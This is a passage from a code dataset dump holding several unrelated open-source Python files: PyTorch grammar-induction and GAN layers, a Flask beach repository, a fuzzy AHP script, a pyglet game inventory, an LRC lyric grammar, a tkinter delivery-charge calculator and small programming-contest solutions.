self.z_dim > 0:\n root_emb = torch.cat([root_emb, self.z], -1)\n root_prob = F.log_softmax(self.root_mlp(root_emb), -1)\n return root_prob\n\n def terms():\n term_emb = self.term_emb.unsqueeze(0).unsqueeze(1).expand(\n b, n, self.T, self.s_dim\n )\n if self.z_dim > 0:\n z_expand = self.z.unsqueeze(1).unsqueeze(2).expand(\n b, n, self.T, self.z_dim\n )\n term_emb = torch.cat([term_emb, z_expand], -1)\n term_prob = F.log_softmax(self.term_mlp(term_emb), -1)\n indices = x.unsqueeze(2).expand(b, n, self.T).unsqueeze(3)\n term_prob = torch.gather(term_prob, 3, indices).squeeze(3)\n return term_prob\n\n def rules():\n nonterm_emb = self.nonterm_emb.unsqueeze(0).expand(\n b, self.NT, self.s_dim\n )\n if self.z_dim > 0:\n z_expand = self.z.unsqueeze(1).expand(\n b, self.NT, self.z_dim\n )\n nonterm_emb = torch.cat([nonterm_emb, z_expand], -1)\n rule_prob = F.log_softmax(self.rule_mlp(nonterm_emb), -1)\n rule_prob = rule_prob.view(b, self.NT, self.NT_T, self.NT_T)\n return rule_prob\n\n roots_ll, terms_ll, rules_ll = roots(), terms(), rules()\n return (terms_ll, rules_ll, roots_ll), kl\n\nclass ImageEncoder(nn.Module):\n def __init__(self, cfg):\n super(ImageEncoder, self).__init__()\n self.no_imgnorm = cfg.no_imgnorm\n in_dim = sum([getattr(cfg, '{}_dim'.format(key)) for key in config.DATASET.EXPERTS])\n self.fc = nn.Linear(in_dim, cfg.sem_dim)\n\n def forward(self, *images):\n images = torch.cat(images, dim=-1).squeeze(1)\n features = self.fc(images)\n if not self.no_imgnorm:\n features = F.normalize(features, dim=-1)\n return features\n\nclass TextEncoder(torch.nn.Module):\n def __init__(self, cfg):\n super(TextEncoder, self).__init__()\n self.NT = cfg.nt_states\n self.sem_dim = cfg.sem_dim\n self.syn_dim = cfg.syn_dim\n self.enc_rnn = torch.nn.LSTM(cfg.word_dim, cfg.lstm_dim, bidirectional=True, num_layers=1, batch_first=True)\n self.enc_out = torch.nn.Linear( cfg.lstm_dim * 2, self.NT * self.sem_dim)\n self.enc_emb = torch.nn.Embedding(len(cfg.word2int), cfg.word_dim, padding_idx=UNK)\n\n def _forward_srnn(self, x_emb, lengths):\n \"\"\"\n lstm over every span, a.k.a. segmental rnn\n \"\"\"\n b, N, dim = x_emb.size()\n word_mask = torch.arange(0, N, device=x_emb.device).unsqueeze(0).expand(b, N).long()\n max_len = lengths.unsqueeze(-1).expand_as(word_mask)\n word_mask = word_mask < max_len\n word_vect = x_emb * word_mask.unsqueeze(-1)\n feats = torch.zeros(b, int(N * (N - 1) / 2), self.NT, self.sem_dim, device=x_emb.device)\n beg_idx = 0\n for k in range(1, N):\n inc = torch.arange(N - k, device=x_emb.device).view(N - k, 1) # .expand(N - k, k + 1)\n idx = torch.arange(k + 1, device=x_emb.device).view(1, k + 1).repeat(N - k, 1)\n idx = (idx + inc).view(-1)\n idx = idx.unsqueeze(0).unsqueeze(-1).expand(b, -1, dim)\n\n feat = torch.gather(word_vect, 1, idx)\n feat = feat.view(b, N - k, k + 1, dim)\n feat = feat.view(-1, k + 1, dim)\n self.enc_rnn.flatten_parameters()\n feat = self.enc_out(self.enc_rnn(feat)[0])\n feat = feat.view(b, N - k, k + 1, self.NT, self.sem_dim)\n feat = F.normalize(feat.sum(2), dim=-1)\n end_idx = beg_idx + N - k\n feats[:, beg_idx: end_idx] = feat\n beg_idx = end_idx\n return feats\n\n def forward(self, captions, caption_lengths):\n word_emb = self.enc_emb(captions)\n return self._forward_srnn(word_emb, caption_lengths.cuda())\n\n\nclass ContrastiveLoss(torch.nn.Module):\n def __init__(self, margin=0):\n super(ContrastiveLoss, self).__init__()\n self.min_val = 1e-8\n self.margin = margin\n\n def forward(self, vid, txt):\n scores = vid.mm(txt.t()) # cosine similarity\n diagonal = scores.diag().view(vid.size(0), 1)\n d1 = diagonal.expand_as(scores)\n d2 = diagonal.t().expand_as(scores)\n\n loss_txt = (self.margin + scores - d1).clamp(min=self.min_val)\n loss_img = (self.margin + scores - d2).clamp(min=self.min_val)\n I = torch.eye(scores.size(0)) > .5\n if torch.cuda.is_available():\n I = I.cuda()\n loss_txt = loss_txt.masked_fill_(I, 0)\n loss_img = loss_img.masked_fill_(I, 0)\n\n loss_txt = loss_txt.mean(1)\n loss_img = loss_img.mean(0)\n return loss_txt + loss_img\n\nclass MixedContrastiveLoss(torch.nn.Module):\n def __init__(self, cfg):\n super(MixedContrastiveLoss, self).__init__()\n self.min_val = 1e-8\n self.gated_emb = GatedEmbedding(cfg)\n self.weight_predictor = nn.Sequential(nn.Linear(cfg.sem_dim, len(config.DATASET.EXPERTS)), nn.Softmax(dim=-1))\n self.margin = cfg.margin\n\n def forward(self, vid, txt):\n\n w = self.weight_predictor(txt)\n txt = self.gated_emb(txt)\n scores = torch.sum(w.t()[...,None]*vid.permute(1,0,2).bmm(txt.permute(1,2,0)), dim=0)\n diagonal = scores.diag().view(vid.size(0), 1)\n d1 = diagonal.expand_as(scores)\n d2 = diagonal.t().expand_as(scores)\n\n loss_txt = (self.margin + scores - d1).clamp(min=self.min_val)\n loss_img = (self.margin + scores - d2).clamp(min=self.min_val)\n\n I = torch.eye(scores.size(0)) > .5\n if torch.cuda.is_available():\n I = I.cuda()\n loss_txt = loss_txt.masked_fill_(I, 0)\n loss_img = loss_img.masked_fill_(I, 0)\n\n loss_txt = loss_txt.mean(1)\n loss_img = loss_img.mean(0)\n return loss_txt + loss_img, w\n\nclass GatedEmbedding(nn.Module):\n def __init__(self, cfg):\n super(GatedEmbedding, self).__init__()\n self.gated_embeddings = nn.ModuleList()\n for expert in config.DATASET.EXPERTS:\n self.gated_embeddings.append(nn.Linear(cfg.sem_dim, cfg.sem_dim))\n\n def forward(self, captions):\n outs = []\n for linear in self.gated_embeddings:\n z = linear(captions)\n z = z * torch.sigmoid(z)\n z = F.normalize(z, dim=-1)\n outs.append(z)\n outs = torch.stack(outs, dim=1)\n return outs\n\nfrom .position_encoding import build_position_encoding\nfrom .transformer import TransformerEncoder, TransformerEncoderLayer\nclass MultiModalTransformer(nn.Module):\n def __init__(self, cfg):\n super(MultiModalTransformer, self).__init__()\n self.cfg = cfg\n self.video_embeddings = nn.ModuleList()\n for expert in config.DATASET.EXPERTS:\n self.video_embeddings.append(nn.Linear(cfg.get(\"{}_dim\".format(expert)), cfg.sem_dim))\n\n self.expert_embedding = nn.Embedding(len(config.DATASET.EXPERTS), cfg.sem_dim)\n self.position_embedding = build_position_encoding(cfg)\n\n encoder_layer = TransformerEncoderLayer(cfg.sem_dim, cfg.nhead, normalize_before=cfg.normalize_before)\n encoder_norm = nn.LayerNorm(cfg.sem_dim) if cfg.normalize_before else None\n self.encoder = TransformerEncoder(encoder_layer, cfg.num_encoder_layers, encoder_norm)\n\n def forward(self, *videos):\n # videos listed as ['appearance', 'motion', 'audio', 'scene', 'ocr', 'face', 'speech']\n features = []\n expert_ids = []\n for i, (linear, feat) in enumerate(zip(self.video_embeddings, videos)):\n features.append(linear(feat))\n expert_ids.append(torch.full(feat.shape[:2], i, dtype=torch.long, device=feat.device))\n features = torch.cat(features, dim=1)\n expert_ids = torch.cat(expert_ids, dim=1)\n expert_embeddings = self.expert_embedding(expert_ids)\n\n position_embeddings = torch.cat([self.position_embedding(\n features, torch.zeros(v.shape[:2], dtype=torch.long, device=features.device)) for v in videos], dim=1)\n output = self.encoder(features.permute(1,0,2), pos=expert_embeddings.permute(1,0,2)+position_embeddings.permute(1,0,2))\n\n # Handle avg+fixed_seg\n if len(videos) != len(output):\n indexes = torch.cumsum(torch.tensor([0]+[v.shape[1] for v in videos[:-1]], dtype=torch.long, device=output.device), dim=0)\n output = output.index_select(0, indexes)\n output = output.permute(1, 0, 2)\n return output","repo_name":"Sy-Zhang/MMC-PCFG","sub_path":"lib/model/vpcfg/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"61"} +{"seq_id":"13181063399","text":"from api.models.beach import Beach\nfrom api import db\n\n\nclass BeachRepository:\n\n @staticmethod\n def get_all_beaches():\n try:\n return Beach.query.all()\n except:\n return []\n\n @staticmethod\n def add_beach(beach):\n try:\n db.session.add(beach)\n db.session.commit()\n except Exception as err:\n print(err)\n return False\n return True\n\n @staticmethod\n def delete_beach(id):\n try:\n Beach.query.filter_by(id=id).delete()\n db.session.commit()\n except:\n return False\n return True\n\n @staticmethod\n def cambiar_ocupacion_actual(playa_id, ocupacion):\n try:\n beach = Beach.query.filter_by(playa_id=playa_id).one()\n beach.ocupacion_actual = ocupacion\n db.session.commit()\n except Exception as e:\n print(e)\n return False\n return True\n\n @staticmethod\n def get_beach_by_playa_id(playa_id):\n try:\n return Beach.query.filter_by(playa_id=playa_id).one()\n except:\n return None\n\n @staticmethod\n def get_beach_by_id(id):\n try:\n return Beach.query.get(id)\n except:\n return None\n\n @staticmethod\n def get_beach_by_nombre_concejo(nombre, concejo):\n try:\n return Beach.query.filter_by(nombre=nombre, concejo=concejo).one()\n except:\n return None\n \"\"\"\n @staticmethod\n def cambiar_ocupacion_actual(id, ocupacion):\n try:\n beach = Beach.query.get(id)\n beach.ocupacion_actual = ocupacion\n db.session.commit()\n except:\n return False\n return True\n \"\"\"","repo_name":"antonioalfa22/sig-playas-asturias","sub_path":"sig-backend/api/repository/beach_repository.py","file_name":"beach_repository.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"147483529","text":"import numpy as np\n\nfrom collections import defaultdict\n\n# Hàm tính trung bình độ mờ Fuzzy\ndef fuzzy_aggregate(matrix):\n # Tính trung bình theo cột của ma trận\n return np.mean(matrix, axis=0)\n\n# Hàm tính trọng số chuẩn hóa Fuzzy\ndef normalize_weights(w_aggregate):\n normalized_weights = defaultdict(float)\n \n # Tổng các trung bình ở mức ��ộ mờ (hàng thứ hai của triplet)\n total_weights = np.sum(w_aggregate[1])\n for index, weight in enumerate(w_aggregate[1]):\n normalized_weights[f'criteria{index + 1}'] = weight / total_weights\n return normalized_weights\n\n# Tạo 'fuzzy' ma trận đối sánh\nfuzzy_matrix = np.array([\n [(1, 1, 1), (1/2, 2/3, 1)],\n [(1, 3/2, 2), (1, 1, 1)]\n])\n\n# Tính trung bình độ mờ Fuzzy và chuẩn hóa trọng số\nfuzzy_weighted_average = fuzzy_aggregate(fuzzy_matrix)\nnormalized_fuzzy_weights = normalize_weights(fuzzy_weighted_average)\nprint(\"Trung bình độ mờ Fuzzy: \", fuzzy_weighted_average)\nprint(\"Trọng số chuẩn hóa Fuzzy: \", dict(normalized_fuzzy_weights))","repo_name":"TienLe0305/Internship-19-10-2023","sub_path":"Python/fahp.py","file_name":"fahp.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70597851075","text":"from pyglet import shapes\nimport pyglet\nimport resources\nfrom enum import Enum\n\n\nclass InventorySprite(pyglet.sprite.Sprite):\n \"\"\" A health bar sprite \"\"\"\n\n def __init__(self, x, y, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.x = x\n self.y = y\n\n\nclass Inventory:\n \"\"\" An object for inventory item sprites and shapes \"\"\"\n\n def __init__(\n self,\n batch,\n foreground_underlay_layer,\n foreground_layer,\n foreground_overlay_layer,\n ):\n\n self.batch = batch\n self.foreground_underlay_layer = foreground_underlay_layer\n self.foreground_layer = foreground_layer\n self.foreground_overlay_layer = foreground_overlay_layer\n self.health_hearts = self.create_health_hearts()\n self.create_health_potion_counter()\n\n def create_health_hearts(self):\n\n tile_size = 32\n heart_y = tile_size * 22.5\n self.health_holder = InventorySprite(\n tile_size * 11,\n tile_size * 22,\n img=resources.heart_holder,\n batch=self.batch,\n group=self.foreground_underlay_layer,\n )\n\n # Create the empty heart that will go behind the filled hearts\n self.health_heart_empty1 = InventorySprite(\n tile_size * 11.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty2 = InventorySprite(\n tile_size * 13.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty3 = InventorySprite(\n tile_size * 15.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty4 = InventorySprite(\n tile_size * 17.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty5 = InventorySprite(\n tile_size * 19.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n\n health_hearts = []\n\n # Create the filled hearts that represent a health point\n health_heart1 = InventorySprite(\n tile_size * 11.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart2 = InventorySprite(\n tile_size * 13.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart3 = InventorySprite(\n tile_size * 15.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart4 = InventorySprite(\n tile_size * 17.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart5 = InventorySprite(\n tile_size * 19.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n\n health_hearts.append(health_heart1)\n health_hearts.append(health_heart2)\n health_hearts.append(health_heart3)\n health_hearts.append(health_heart4)\n health_hearts.append(health_heart5)\n\n return health_hearts\n\n def create_health_potion_counter(self):\n\n tile_size = 32\n\n self.backpack_inventory = InventorySprite(\n tile_size * 30,\n tile_size * 22,\n img=resources.backpack_inventory,\n batch=self.batch,\n group=self.foreground_underlay_layer,\n )\n self.health_potion_sprite = InventorySprite(\n tile_size * 30.5,\n tile_size * 22.5,\n img=resources.health_potion,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_potion_counter = pyglet.text.Label(\n \"\",\n font_name=\"Arial\",\n font_size=10,\n x=self.health_potion_sprite.x + 28,\n y=self.health_potion_sprite.y - 4,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_potion_sprite.visible = False\n\n def update_inventory(self, value, inventory_type):\n if inventory_type == inventory_type.HEALTH:\n self.update_health(value)\n elif inventory_type == inventory_type.HEALING_POTIONS:\n self.update_potions(value)\n\n # Update the health bar to the new health. Health is assumed to be based on 100 max health.\n def update_health(self, new_health):\n # Go through all of the hearts and change the image to an empty heart for any that represent health higher than what the player has.\n for index, obj in enumerate(self.health_hearts):\n if (new_health - 1) < index:\n obj.visible = False\n else:\n obj.visible = True\n\n def update_potions(self, new_potions_count):\n\n self.health_potion_counter.text = str(new_potions_count)\n\n if new_potions_count == 0:\n self.health_potion_counter.text = \"\"\n self.health_potion_sprite.visible = False\n else:\n self.health_potion_counter.text = str(new_potions_count)\n self.health_potion_sprite.visible = True\n\n\nclass InventoryType(Enum):\n HEALTH = 1\n HEALING_POTIONS = 2\n","repo_name":"JayMil/GameJam","sub_path":"src/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28908116116","text":"from functools import partial\nfrom typing import Optional\n\nfrom textx import LanguageDesc, metamodel_from_str\n\nfrom libresvip.model.base import BaseModel\n\ngrammar = \"\"\"\nLyricFile:\n info_tags*=InfoTag\n lyric_lines+=LyricLine\n;\nLineBreak: '\\r'? '\\n';\nTag: /[a-zA-Z]+/;\nWord: /[^\\r\\n]*?/;\nTimeTag: '[' minute=INT ':' second=INT '.' percent_second=INT ']';\nLyricLine: time_tags+=TimeTag lyric?=Word LineBreak;\nInfoTag: '[' key=Tag ':' value=Word ']' LineBreak;\n\"\"\"\n\n\nclass TimeTag(BaseModel):\n minute: int\n second: int\n percent_second: int\n\n\nclass LyricLine(BaseModel):\n time_tags: list[TimeTag]\n lyric: Optional[str] = None\n\n\nclass InfoTag(BaseModel):\n key: str\n value: str\n\n\nclass LrcFile(BaseModel):\n info_tags: list[InfoTag]\n lyric_lines: list[LyricLine]\n\n\nTitleInfoTag = partial(InfoTag, key=\"ti\")\nArtistInfoTag = partial(InfoTag, key=\"ar\")\nAlbumInfoTag = partial(InfoTag, key=\"al\")\nByInfoTag = partial(InfoTag, key=\"by\")\nOffsetInfoTag = partial(InfoTag, key=\"offset\")\n\n\nLrcModel = metamodel_from_str(\n grammar, skipws=False, classes=[TimeTag, LyricLine, InfoTag]\n)\n\nlrc_language = LanguageDesc(\"lrc\", \"*.lrc\", \"lrc歌词文件\", metamodel=LrcModel)\n","repo_name":"SoulMelody/LibreSVIP","sub_path":"libresvip/plugins/lrc/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11579851716","text":"from tkinter import *\nfrom tkinter.scrolledtext import *\n\n\nclass DeliveryChargeCalculator:\n\n \"\"\"\n tkinter GUI that calculates delivery charges\n Accepts inputs of the length, width, height and weight of a package.\n Delivery charges are then calculated based on the inputs.\n Charges are displayed in the GUI output textbox.\n \"\"\"\n\n def __init__(self):\n\n \"\"\"Initialises the GUI and all of it's labels, entries, buttons, scrolled text\n and radio buttons\"\"\"\n\n self._tk = Tk() # creates a GUI window\n self._tk.title('Delivery Charges Calculator') # change the title of GUI window\n self._tk.geometry('700x330') # set window size to 700*330\n\n # ===================================Top Frame==================================\n top_frame = Frame(self._tk) # add top frame to GUI window\n self._length_label = Label(top_frame, text='Length:')\n self._length_label.grid(row=0, column=0, sticky=E, padx=24)\n self._length_entry = Entry(top_frame, width=20)\n self._length_entry.grid(row=0, column=1, sticky=W)\n self._width_label = Label(top_frame, text='Width:')\n self._width_label.grid(row=1, column=0, sticky=E, padx=32)\n self._width_entry = Entry(top_frame, width=20)\n self._width_entry.grid(row=1, column=1, sticky=W)\n self._height_label = Label(top_frame, text='Height:')\n self._height_label.grid(row=2, column=0, sticky=E, padx=28)\n self._height_entry = Entry(top_frame, width=20)\n self._height_entry.grid(row=2, column=1, sticky=W)\n\n # ==================================Unit Frame==================================\n unit_frame = Frame(top_frame)\n self._unit_radio = IntVar()\n self._unit_radio.set(0)\n self._cm_radio = Radiobutton(unit_frame, text='cm', value=0, variable=self._unit_radio)\n self._cm_radio.grid(row=0, column=0)\n self._inch_radio = Radiobutton(unit_frame, text='inch', value=1, variable=self._unit_radio)\n self._inch_radio.grid(row=0, column=1)\n unit_frame.grid(row=3, column=1, sticky=W)\n\n # ==============================Top Frame Continue==============================\n self._space_label = Label(top_frame, text='') # empty label for spacing\n self._space_label.grid(row=4, column=1)\n\n # weight label and entry\n self._weight_label = Label(top_frame, text='Weight(kg):')\n self._weight_label.grid(row=5, column=0, sticky=E)\n self._weight_entry = Entry(top_frame, width=20)\n self._weight_entry.grid(row=5, column=1, sticky=W)\n\n # ===============================Button Frame===================================\n button_frame = Frame(top_frame)\n self._cal_button = Button(button_frame, text='Calculate Charge', command=self.calculate)\n self._cal_button.grid(row=0, column=0)\n self._clear_button = Button(button_frame, text='Clear', width=10, command=self.clear)\n self._clear_button.grid(row=0, column=1)\n button_frame.grid(row=6, column=1, sticky=EW)\n\n # ================================Scroll Text===================================\n self._output = ScrolledText(top_frame, width=95, height=10, state=DISABLED)\n self._output.grid(row=7, column=0, columnspan=2)\n\n top_frame.pack()\n\n self._tk.mainloop() # execute main loop\n\n def calculate(self):\n \"\"\"Calculates volumetric weight. Volumetric weight is compared with the actual weight\n Delivery charge is calculated based on the higher of the actual and volumetric weight\"\"\"\n\n actual_weight = float(self._weight_entry.get())\n leng = float(self._length_entry.get())\n wid = float(self._width_entry.get())\n ht = float(self._height_entry.get())\n vol = leng * wid * ht\n\n # Append outputs\n self._output.configure(state=NORMAL)\n self._output.insert(END, 'Next Parcel\\n')\n # check which unit is used\n if self._unit_radio.get() == 0: # cm is the chosen unit\n vol_weight = vol / 6000\n self._output.insert(END, f'{leng}cm x {wid}cm x {ht}cm = {vol}cm^3 or {vol_weight:.2f}kg\\n')\n else: # inch is the chosen unit\n vol_weight = vol / 366\n self._output.insert(END, f'{leng}inch x {wid}inch x {ht}inch = {vol}inch^3 or {vol_weight:.2f}kg\\n')\n # check which is the higher weight\n if vol_weight > actual_weight: # vol_w is larger\n used = vol_weight\n else:\n used = actual_weight\n self._output.insert(END, f'Charges based on the higher of ({vol_weight:.2f}, {actual_weight}) = {used:.2f}kg\\n')\n\n # Calculate delivery charges\n base_rate = 3\n charge = 0\n if used < 3:\n charge = 3 + base_rate\n elif used == 3 or used < 5:\n charge = 7 + base_rate\n elif used == 5 or used < 10:\n charge = 12 + base_rate\n elif used >= 10:\n charge = 30 + base_rate\n self._output.insert(END, f'Delivery Charge = ${charge:.2f}\\n')\n self._output.configure(state=DISABLED)\n\n def clear(self):\n \"\"\"\n To clear input fields after calculation.\n \"\"\"\n self._length_entry.delete(0, END)\n self._width_entry.delete(0, END)\n self._height_entry.delete(0, END)\n self._weight_entry.delete(0, END)\n self._output.configure(state=NORMAL)\n self._output.delete(1.0, END)\n self._output.configure(state=DISABLED)\n self._unit_radio.set(0)\n\n\nDeliveryChargeCalculator()\n","repo_name":"hongmei-codes/tkinter_delivery_charge","sub_path":"delivery_charge.py","file_name":"delivery_charge.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13998909538","text":"def get_position(seat_spec):\n row_spec = seat_spec[:7]\n column_spec = seat_spec[7:]\n\n row_binary = row_spec.replace(\"F\", \"0\").replace(\"B\", \"1\")\n row = int(row_binary, 2)\n\n column_binary = column_spec.replace(\"L\", \"0\").replace(\"R\", \"1\")\n column = int(column_binary, 2)\n\n return (row, column)\n\ndef get_seat_id(row, column):\n return row*8 + column\n\n\nwith open(\"input.txt\", \"r\") as f:\n lines = [line.strip() for line in f]\n\n\nresult = max([get_seat_id(*(get_position(line))) for line in lines])\nprint(result)","repo_name":"tobire42/aoc","sub_path":"2020/day-05/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148850452","text":"import sys\nfrom collections import deque\nimport copy\ndef main():\n N = int(input())\n S = []\n for i in range(N):\n s = input()\n S.append(s)\n S.sort()\n count = N\n for i in range(1, len(S)):\n if S[i - 1] == S[i]:\n count -= 1\n print(count)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc164/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9172333935","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import Dataset\n\nlrelu_gain = (2.0 / (1 + 0.2 ** 2)) ** 0.5\n\n\ndef weights_init(m):\n # This was taken from the PyTorch DCGAN tutorial: https://pytorch.org/tutorials/beginner/dcgan_faces_tutorial.html\n classname = m.__class__.__name__\n\n if classname.find('LinearNormalizedLR') != -1:\n nn.init.normal_(m.weight.data, 0.0, 1.0)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n\n elif classname.find('Conv2dNormalizedLR') != -1:\n nn.init.normal_(m.weight.data, 0.0, 1.0)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n elif classname.find('Conv2dTransposeNormalizedLR') != -1:\n nn.init.normal_(m.weight.data, 0.0, 1.0)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n elif classname.find('Conv2d') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n\n elif classname.find('Linear') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n\n elif classname.find('BatchNorm') != -1:\n if m.affine:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n\nclass Conv2dNormalizedLR(torch.nn.Module):\n def __init__(self, in_channels: int, out_channels: int, kernel_size=1, stride=1, padding=0, bias=True,\n weight_norm=False, gain=lrelu_gain):\n super().__init__()\n self.stride = stride\n self.padding = padding\n self.weight_norm = weight_norm\n self.he_constant = gain / (float(in_channels * kernel_size * kernel_size) ** 0.5)\n\n self.weight = torch.nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size, kernel_size))\n\n if bias:\n self.bias = torch.nn.Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter(\"bias\", None)\n self.bias = None\n self.reset_parameters()\n\n def forward(self, inp):\n weight = self.weight * self.he_constant\n if self.weight_norm:\n weight = apply_weight_norm(weight, input_dims=(1, 2, 3))\n x = torch.nn.functional.conv2d(inp, weight, self.bias, self.stride, self.padding)\n return x\n\n def reset_parameters(self):\n nn.init.normal_(self.weight.data, 0.0, 1.0)\n if self.bias is not None:\n nn.init.constant_(self.bias.data, 0)\n\n\nclass Conv2dTransposeNormalizedLR(torch.nn.Module):\n def __init__(self, in_channels: int, out_channels: int, kernel_size=1, stride=1, padding=0, bias=True,\n weight_norm=False, gain=lrelu_gain):\n super().__init__()\n self.stride = stride\n self.padding = padding\n self.weight_norm = weight_norm\n # In the ProGAN source code the kernel**2 is also included.\n # I don't understand why, since the input of conv2d transpose is 1x1 as far as I'm aware, but okay.\n self.he_constant = gain / (float(in_channels * kernel_size * kernel_size) ** 0.5)\n\n self.weight = torch.nn.Parameter(torch.Tensor(in_channels, out_channels, kernel_size, kernel_size))\n\n if bias:\n self.bias = torch.nn.Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter(\"bias\", None)\n self.reset_parameters()\n\n def forward(self, inp):\n weight = self.weight * self.he_constant\n if self.weight_norm:\n weight = apply_weight_norm(weight, input_dims=(0, 2, 3))\n x = torch.nn.functional.conv_transpose2d(inp, weight, self.bias, self.stride, self.padding)\n return x\n\n def reset_parameters(self):\n nn.init.normal_(self.weight.data, 0.0, 1.0)\n if self.bias is not None:\n nn.init.constant_(self.bias.data, 0)\n\n\nclass LinearNormalizedLR(torch.nn.Module):\n def __init__(self, in_channels: int, out_channels: int, bias=True, weight_norm=False, gain=lrelu_gain):\n super().__init__()\n self.he_constant = gain / (float(in_channels) ** 0.5)\n\n self.weight = torch.nn.Parameter(torch.Tensor(out_channels, in_channels))\n self.weight_norm = weight_norm\n\n if bias:\n self.bias = torch.nn.Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter(\"bias\", None)\n self.reset_parameters()\n\n def forward(self, inp):\n weight = self.weight * self.he_constant\n if self.weight_norm:\n weight = apply_weight_norm(weight, input_dims=1)\n x = torch.nn.functional.linear(inp, weight, self.bias)\n return x\n\n def reset_parameters(self):\n nn.init.normal_(self.weight.data, 0.0, 1.0)\n if self.bias is not None:\n nn.init.constant_(self.bias.data, 0)\n\n\ndef local_response_normalization(x, eps=1e-8):\n \"\"\"\n Implements the variant of LRN used in ProGAN https://arxiv.org/pdf/1710.10196.pdf\n :param eps: Epsilon is a small number added to the divisor to avoid division by zero\n :param x: Output of convolutional layer (or any other tensor with channels on axis 1)\n :return: Normalized x\n \"\"\"\n divisor = (torch.pow(x, 2).mean(dim=1, keepdim=True) + eps).sqrt()\n b = x / divisor\n return b\n\n\nclass LocalResponseNorm(torch.nn.Module):\n def __init__(self, eps=1e-8):\n \"\"\"\n Implements the variant of LRN used in ProGAN https://arxiv.org/pdf/1710.10196.pdf\n :param eps: Epsilon is a small number added to the divisor to avoid division by zero\n \"\"\"\n super().__init__()\n self.eps = eps\n\n def forward(self, inp):\n return local_response_normalization(inp, self.eps)\n\n\ndef update_output_network(G_out, G, factor=0.999):\n for (p_out, p_train) in zip(G_out.parameters(), G.parameters()):\n p_out.data = p_out.data * factor + p_train.data * (1.0 - factor)\n\n\ndef save_checkpoint(folder_path, G, G_out, D, optim_G, optim_D, info_obj, enc=None, enc_opt=None):\n torch.save(\n {\n \"G\": G.state_dict(),\n \"G_out\": G_out.state_dict(),\n \"D\": D.state_dict(),\n \"optim_G\": optim_G.state_dict(),\n \"optim_D\": optim_D.state_dict(),\n \"info\": info_obj,\n \"enc\": enc.state_dict() if enc is not None else None,\n \"enc_opt\": enc_opt.state_dict() if enc_opt is not None else None,\n },\n folder_path\n )\n\n\ndef load_checkpoint(folder_path, G, G_out, D, optim_G, optim_D, enc=None, enc_opt=None):\n \"\"\"\n Loads state dict into Modules\n :param path: Path to checkpoint\n :return Info object created by other methods\n \"\"\"\n checkpoint = torch.load(folder_path)\n G.load_state_dict(checkpoint[\"G\"])\n G_out.load_state_dict(checkpoint[\"G_out\"])\n D.load_state_dict(checkpoint[\"D\"])\n optim_G.load_state_dict(checkpoint[\"optim_G\"])\n optim_D.load_state_dict(checkpoint[\"optim_D\"])\n if enc is not None:\n enc.load_state_dict(checkpoint[\"enc\"])\n if enc_opt is not None:\n enc_opt.load_state_dict(checkpoint[\"enc_opt\"])\n return checkpoint[\"info\"]\n\n\ndef apply_weight_norm(w, input_dims=(1, 2, 3), eps=1e-8):\n \"\"\"\n Applies the \"demodulation\" operation from StyleGAN2 as a form of normalization.\n :param w: Weights\n :return: Normed weights\n \"\"\"\n divisor = torch.sqrt((w ** 